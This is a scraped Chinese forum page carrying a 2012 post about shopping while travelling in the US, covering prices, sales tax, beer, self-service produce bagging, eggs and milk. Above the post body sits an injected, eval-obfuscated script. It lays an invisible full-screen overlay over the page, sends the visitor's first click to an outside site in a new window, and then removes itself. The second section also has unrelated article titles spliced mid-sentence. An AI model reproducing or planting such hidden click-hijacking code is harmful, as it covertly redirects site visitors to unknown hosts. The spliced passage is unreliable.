滴答网 - 澳洲中文网_澳洲交友_澳洲租房_澳洲房产_澳洲旅游_澳洲汽车_二手市场_澳大利亚华人论坛
标题:
美国旅游时购物的一些简单介绍
[打印本页]
作者:
imluffy
时间:
2012-3-13 17:37
标题:
美国旅游时购物的一些简单介绍
<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>一、价格特点。尾数常是9,例如0.19、0.99、4.99美元,几百美元以上可能让利1元,例如599美元。明码标价,不讨价还价。除食品外,在密执安州其他商品另交6%的消费税。如买彩电300美元,加6%消费税,实付318美元。
二、瓶装啤酒 2006乘着火车游西藏 马行夏日"放牧"京郊 心静之旅"禅"之旅 环球跳蚤市场淘宝记 比罐装啤酒价高,此点与中国恰恰相反。在美国,无论瓶装还是罐装啤酒都是355毫升,以中等价格算,一瓶啤酒0.75美元,一罐啤酒0.50美元,贵0.25美元。另外,星期日12:00之前不卖酒。我曾有两次自选啤酒或葡萄酒,但在结帐时被扣。因为周日是礼拜日,据说上午卖酒是对上帝不恭。
三、自取塑料袋、自行包装、自己称重。美国工人工资高,为降低成本,老板尽量少雇人。在果菜超市,少部分水果、蔬菜已袋装或捆好,而大部分由顾客自行包装。例如豆角、土豆、香蕉、李子等等,买多少包多少。相隔不远处有一捆塑料袋装于转轮上,塑料袋每隔50厘米有断缝,撕断取下即可使用。不远处吊着秤,重量单位是磅,称好了便在出口处算帐。
四、菜、蛋洗得较干净,买回家后可以少洗或不洗。供生吃的黄瓜采摘后即用细长塑料袋包扎好,避免在运输和零售过程中受到污染。鸡蛋较干净,无异味,放在长条形盒内,常见的是每盒12个,易取易放。鸡蛋按大小分别装盒,鸡蛋越大价格越高。常见的标价是:0.73、0.89、1.09美元一盒。最贵的菜是韭菜,3美元一磅(相当于9两),最便宜的是包心菜,0.17美元一磅。
五、牛奶为桶装式。每桶3785毫升(1加仑)。因为每周购物一次,用大容量包装易取又降低成本。美国店内不出售肥皂(有香皂),中国店出售半透明的洗衣皂,但不是国内常见的洗衣皂。美国人洗衣洗手都是用洗涤剂,用桶装或小瓶装。
欢迎光临 滴答网 - 澳洲中文网_澳洲交友_澳洲租房_澳洲房产_澳洲旅游_澳洲汽车_二手市场_澳大利亚华人论坛 (https://nearther.cn/)
Powered by Discuz! X3.2